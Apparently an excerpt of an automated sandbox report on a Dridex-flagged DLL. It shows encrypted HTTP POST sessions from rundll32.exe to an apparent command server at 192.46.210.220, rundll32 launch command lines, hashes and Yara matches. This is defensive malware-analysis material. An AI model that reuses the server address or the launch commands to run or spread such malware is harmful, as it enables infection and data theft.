                                                                                                        2021-10-28 03:06:31 UTC400OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
Timestamp: 2021-10-28 03:06:32 UTC, kBytes transferred: 405, Direction: IN, Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:32 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 82, Source IP: 192.168.2.3, Source Port: 50148, Destination IP: 192.46.210.220, Destination Port: 443, Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:06:35 UTC, kBytes transferred: 405, Direction: OUT, Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:35 UTC405OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
Timestamp: 2021-10-28 03:06:35 UTC, kBytes transferred: 414, Direction: IN, Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 83, Source IP: 192.168.2.3, Source Port: 50149, Destination IP: 192.46.210.220, Destination Port: 443, Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:06:35 UTC, kBytes transferred: 410, Direction: OUT, Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:35 UTC410OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
Timestamp: 2021-10-28 03:06:35 UTC, kBytes transferred: 415, Direction: IN, Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 84, Source IP: 192.168.2.3, Source Port: 50156, Destination IP: 192.46.210.220, Destination Port: 443, Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:06:38 UTC, kBytes transferred: 415, Direction: OUT, Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:38 UTC415OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
Timestamp: 2021-10-28 03:06:39 UTC, kBytes transferred: 424, Direction: IN, Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:39 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 85, Source IP: 192.168.2.3, Source Port: 50157, Destination IP: 192.46.210.220, Destination Port: 443, Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:06:39 UTC, kBytes transferred: 419, Direction: OUT, Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4814
Connection: Close
Cache-Control: no-cache
                                                                                                        2021-10-28 03:06:39 UTC420OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
Timestamp: 2021-10-28 03:06:39 UTC, kBytes transferred: 424, Direction: IN, Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:39 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 9, Source IP: 192.168.2.3, Source Port: 49780, Destination IP: 192.46.210.220, Destination Port: 443, Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:04:06 UTC, kBytes transferred: 44, Direction: OUT, Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4802
Connection: Close
Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:06 UTC44OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
Timestamp: 2021-10-28 03:04:06 UTC, kBytes transferred: 49, Direction: IN, Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:04:06 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior


                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Start time:05:02:36
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll'
                                                                                                        Imagebase:0x270000
                                                                                                        File size:893440 bytes
                                                                                                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.838096083.000000006E651000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.440875078.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate

                                                                                                        General

                                                                                                        Start time:05:02:36
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                                                                                                        Imagebase:0xd80000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:05:02:37
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing
                                                                                                        Imagebase:0x8d0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.415782949.0000000000520000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:05:02:37
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                                                                                                        Imagebase:0x8d0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.417154756.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.869577587.000000006E651000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:05:02:41
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Earth
                                                                                                        Imagebase:0x8d0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.431444346.0000000004DA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:05:02:45
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Masterjust
                                                                                                        Imagebase:0x8d0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000003.439012632.0000000002D50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Disassembly

                                                                                                        Code Analysis
